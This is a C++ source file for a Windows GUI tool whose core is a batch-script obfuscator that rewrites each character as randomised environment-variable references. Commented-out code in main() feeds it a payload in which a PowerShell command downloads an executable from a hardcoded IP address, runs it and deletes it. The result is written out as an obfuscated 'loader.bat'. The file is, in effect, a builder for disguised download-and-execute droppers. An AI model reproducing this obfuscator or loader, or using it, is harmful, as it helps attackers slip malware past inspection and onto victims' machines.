﻿#include "MainWindow.h"
//#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
class batEnc
{
private:
	std::unordered_map<char, std::string> chars;
	std::stringstream sb;
	std::string randomString4()
	{
		char tmp[5];
		char keys[] = "QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm";
		tmp[0] = keys[Random::Next() % 52];
		tmp[1] = keys[Random::Next() % 52];
		tmp[2] = keys[Random::Next() % 52];
		tmp[3] = keys[Random::Next() % 52];
		tmp[4] = '\0';
		return std::string(tmp);
	}
	void check(char c)
	{
		auto found = chars.find(c);
		if (found == chars.end())
		{
			chars[c] = randomString4();
			sb << ref('s') << ref('e') << ref('t') << ref(' ') << chars[c] << ref('=') << c << std::endl;
		}
	}
	void random(char c)
	{
		auto found = chars.find(c);
		if (found == chars.end())
		{
			chars[c] = randomString4();
			sb << ref('s') << ref('e') << ref('t') << ref(' ') << chars[c] << ref('=') << c << std::endl;
		}
		else
		{
			auto ss = randomString4();
			if (chars[c].size() == 4 && chars[c][0] == c)
				sb << ref('s') << ref('e') << ref('t') << ref(' ') << ss << ref('=') << c << std::endl;
			else
				sb << ref('s') << ref('e') << ref('t') << ref(' ') << ss << ref('=') << ref(c) << std::endl;
			chars[c] = ss;
		}
	}
	void random()
	{
		for (auto c : chars)
			random(c.first);
	}
	void random(std::string s)
	{
		for (auto c : s)
			random(c);
	}
	std::string ref(char c)
	{
		return "%" + chars[c] + "%";
	}
	std::string ref(std::string s)
	{
		std::string res = "";
		for (auto s_ : s)
			res += ref(s_);
		return res;
	}
	void input(char c)
	{
		sb << ref(c);
	}
	void input(std::string str)
	{
		for (auto c : str)
			check(c);
		for (auto c : str)
			input(c);
		sb << std::endl;
	}
public:
	batEnc()
	{
		chars = std::unordered_map<char, std::string>();
		sb << "@echo off" << std::endl;
		chars[' '] = randomString4();
		sb << "set " << chars[' '] << "= " << std::endl;

		chars['='] = randomString4();
		sb << "set" << ref(' ') << chars['='] << "==" << std::endl;

		chars['s'] = randomString4();
		sb << "set" << ref(' ') << chars['s'] << ref('=') << "s" << std::endl;

		chars['e'] = randomString4();
		sb << ref('s') << "et" << ref(' ') << chars['e'] << ref('=') << "e" << std::endl;

		chars['t'] = randomString4();
		sb << ref('s') << ref('e') << "t" << ref(' ') << chars['t'] << ref('=') << "t" << std::endl;
	}
	std::string convert(std::string str)
	{
		auto lines = StringHelper::Split(str, { '\r','\n' });
		random("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ");
		random("0123456789");
		random("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz");
		random("0987654321");
		random("QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm");
		random("3571986240");
		for (auto l : lines)
		{
			random(l);
			input(l);
		}
		return sb.str();
	}
};

static constexpr const uint32_t hexTableW[] =
{
	0x300030,0x310030,0x320030,0x330030,0x340030,0x350030,0x360030,0x370030,0x380030,0x390030,0x410030,0x420030,0x430030,0x440030,0x450030,0x460030,
	0x300031,0x310031,0x320031,0x330031,0x340031,0x350031,0x360031,0x370031,0x380031,0x390031,0x410031,0x420031,0x430031,0x440031,0x450031,0x460031,
	0x300032,0x310032,0x320032,0x330032,0x340032,0x350032,0x360032,0x370032,0x380032,0x390032,0x410032,0x420032,0x430032,0x440032,0x450032,0x460032,
	0x300033,0x310033,0x320033,0x330033,0x340033,0x350033,0x360033,0x370033,0x380033,0x390033,0x410033,0x420033,0x430033,0x440033,0x450033,0x460033,
	0x300034,0x310034,0x320034,0x330034,0x340034,0x350034,0x360034,0x370034,0x380034,0x390034,0x410034,0x420034,0x430034,0x440034,0x450034,0x460034,
	0x300035,0x310035,0x320035,0x330035,0x340035,0x350035,0x360035,0x370035,0x380035,0x390035,0x410035,0x420035,0x430035,0x440035,0x450035,0x460035,
	0x300036,0x310036,0x320036,0x330036,0x340036,0x350036,0x360036,0x370036,0x380036,0x390036,0x410036,0x420036,0x430036,0x440036,0x450036,0x460036,
	0x300037,0x310037,0x320037,0x330037,0x340037,0x350037,0x360037,0x370037,0x380037,0x390037,0x410037,0x420037,0x430037,0x440037,0x450037,0x460037,
	0x300038,0x310038,0x320038,0x330038,0x340038,0x350038,0x360038,0x370038,0x380038,0x390038,0x410038,0x420038,0x430038,0x440038,0x450038,0x460038,
	0x300039,0x310039,0x320039,0x330039,0x340039,0x350039,0x360039,0x370039,0x380039,0x390039,0x410039,0x420039,0x430039,0x440039,0x450039,0x460039,
	0x300041,0x310041,0x320041,0x330041,0x340041,0x350041,0x360041,0x370041,0x380041,0x390041,0x410041,0x420041,0x430041,0x440041,0x450041,0x460041,
	0x300042,0x310042,0x320042,0x330042,0x340042,0x350042,0x360042,0x370042,0x380042,0x390042,0x410042,0x420042,0x430042,0x440042,0x450042,0x460042,
	0x300043,0x310043,0x320043,0x330043,0x340043,0x350043,0x360043,0x370043,0x380043,0x390043,0x410043,0x420043,0x430043,0x440043,0x450043,0x460043,
	0x300044,0x310044,0x320044,0x330044,0x340044,0x350044,0x360044,0x370044,0x380044,0x390044,0x410044,0x420044,0x430044,0x440044,0x450044,0x460044,
	0x300045,0x310045,0x320045,0x330045,0x340045,0x350045,0x360045,0x370045,0x380045,0x390045,0x410045,0x420045,0x430045,0x440045,0x450045,0x460045,
	0x300046,0x310046,0x320046,0x330046,0x340046,0x350046,0x360046,0x370046,0x380046,0x390046,0x410046,0x420046,0x430046,0x440046,0x450046,0x460046,
};
static constexpr const uint32_t hexTableWCC[] =
{
'00\0000','01\0000','02\0000','03\0000','04\0000','05\0000','06\0000','07\0000','08\0000','09\0000','0A\0000','0B\0000','0C\0000','0D\0000','0E\0000','0F\0000',
'00\0001','01\0001','02\0001','03\0001','04\0001','05\0001','06\0001','07\0001','08\0001','09\0001','0A\0001','0B\0001','0C\0001','0D\0001','0E\0001','0F\0001',
'00\0002','01\0002','02\0002','03\0002','04\0002','05\0002','06\0002','07\0002','08\0002','09\0002','0A\0002','0B\0002','0C\0002','0D\0002','0E\0002','0F\0002',
'00\0003','01\0003','02\0003','03\0003','04\0003','05\0003','06\0003','07\0003','08\0003','09\0003','0A\0003','0B\0003','0C\0003','0D\0003','0E\0003','0F\0003',
'00\0004','01\0004','02\0004','03\0004','04\0004','05\0004','06\0004','07\0004','08\0004','09\0004','0A\0004','0B\0004','0C\0004','0D\0004','0E\0004','0F\0004',
'00\0005','01\0005','02\0005','03\0005','04\0005','05\0005','06\0005','07\0005','08\0005','09\0005','0A\0005','0B\0005','0C\0005','0D\0005','0E\0005','0F\0005',
'00\0006','01\0006','02\0006','03\0006','04\0006','05\0006','06\0006','07\0006','08\0006','09\0006','0A\0006','0B\0006','0C\0006','0D\0006','0E\0006','0F\0006',
'00\0007','01\0007','02\0007','03\0007','04\0007','05\0007','06\0007','07\0007','08\0007','09\0007','0A\0007','0B\0007','0C\0007','0D\0007','0E\0007','0F\0007',
'00\0008','01\0008','02\0008','03\0008','04\0008','05\0008','06\0008','07\0008','08\0008','09\0008','0A\0008','0B\0008','0C\0008','0D\0008','0E\0008','0F\0008',
'00\0009','01\0009','02\0009','03\0009','04\0009','05\0009','06\0009','07\0009','08\0009','09\0009','0A\0009','0B\0009','0C\0009','0D\0009','0E\0009','0F\0009',
'00\000A','01\000A','02\000A','03\000A','04\000A','05\000A','06\000A','07\000A','08\000A','09\000A','0A\000A','0B\000A','0C\000A','0D\000A','0E\000A','0F\000A',
'00\000B','01\000B','02\000B','03\000B','04\000B','05\000B','06\000B','07\000B','08\000B','09\000B','0A\000B','0B\000B','0C\000B','0D\000B','0E\000B','0F\000B',
'00\000C','01\000C','02\000C','03\000C','04\000C','05\000C','06\000C','07\000C','08\000C','09\000C','0A\000C','0B\000C','0C\000C','0D\000C','0E\000C','0F\000C',
'00\000D','01\000D','02\000D','03\000D','04\000D','05\000D','06\000D','07\000D','08\000D','09\000D','0A\000D','0B\000D','0C\000D','0D\000D','0E\000D','0F\000D',
'00\000E','01\000E','02\000E','03\000E','04\000E','05\000E','06\000E','07\000E','08\000E','09\000E','0A\000E','0B\000E','0C\000E','0D\000E','0E\000E','0F\000E',
'00\000F','01\000F','02\000F','03\000F','04\000F','05\000F','06\000F','07\000F','08\000F','09\000F','0A\000F','0B\000F','0C\000F','0D\000F','0E\000F','0F\000F',
};
int main(int argc, char** argv)
{
	//const char* keyTable = "0123456789ABCDEF";

	//for (int i = 0; i < 0x100; i++)
	//{
	//	char output[3] = {0,0,0};
	//	output[1] = keyTable[(*(uint8_t*)&i & 0x0F) >> 0x00];
	//	output[0] = keyTable[(*(uint8_t*)&i & 0xF0) >> 0x04];
	//	//printf("0x%ws,", output);
	//	printf("\'%c\\000%c\',", output[1], output[0]);
	//	if ((i + 1) % 16 == 0)
	//		printf("\n");
	//}
	//return 0;

	//int dx = 0;
	//while (1)
	//{
	//	TCPSocket cli;
	//	if (cli.Connect("127.0.0.1", 8288))
	//	{
	//		std::string str = StringHelper::Format("HELLO - %d",dx++);
	//		cli.Send(str.c_str(), str.size());
	//		cli.Close();
	//	}
	//}
	//return 1;
	//TCPSocket ser;
	//ser.Listen(8288);
	//while (1)
	//{
	//	auto socket_ = ser.Accept();
	//	char buffer[0x1000] = {};
	//	auto len = socket_->Receive(buffer, 0x1000);
	//	socket_->Close();
	//	if (len > 0)
	//	{
	//		printf("%s\n", buffer);
	//	}
	//}
	//return 1;


	//BYTE char_array_4[4]{};
	//uint32_t value = 0x12045678;
	//char_array_4[0] = (value >> 24) & 0xFF;
	//char_array_4[1] = (value >> 16) & 0xFF;
	//char_array_4[2] = (value >> 8) & 0xFF;
	//char_array_4[3] = value & 0xFF;

	//*(uint32_t*)char_array_4 = value & 0xFFFFFFFFu;
	//auto s = R"(
	//cls
	//color 24
	//color 24
	//powershell (new-object System.Net.WebClient).DownloadFile( 'http://43.248.131.235:8088/DownLoadBin?filename=sdasgfsrfdgkhnsdfgkjgbksenrflkasejeorjfbhgfjic','c:\a.exe')
	//c:\a.exe
	//del c:\a.exe
	//)";
	//batEnc enc;
	//auto str = enc.convert(s);
	//List<char> buffer;
	//buffer.Add(0xFE);
	//buffer.Add(0xFF);
	//buffer.Add(0x0D);
	//buffer.Add(0x0A);
	//buffer.AddRange(str.data(), str.size());
	//File::WriteAllBytes(R"(loader.bat)", (BYTE*)buffer.data(), buffer.size());

	MainWindow* fm = new MainWindow();
	fm->Show();
	MSG msg;
	while (GetMessage(&msg, NULL, 0, 0))
	{
		TranslateMessage(&msg);
		DispatchMessage(&msg);
	};
	return NULL;
}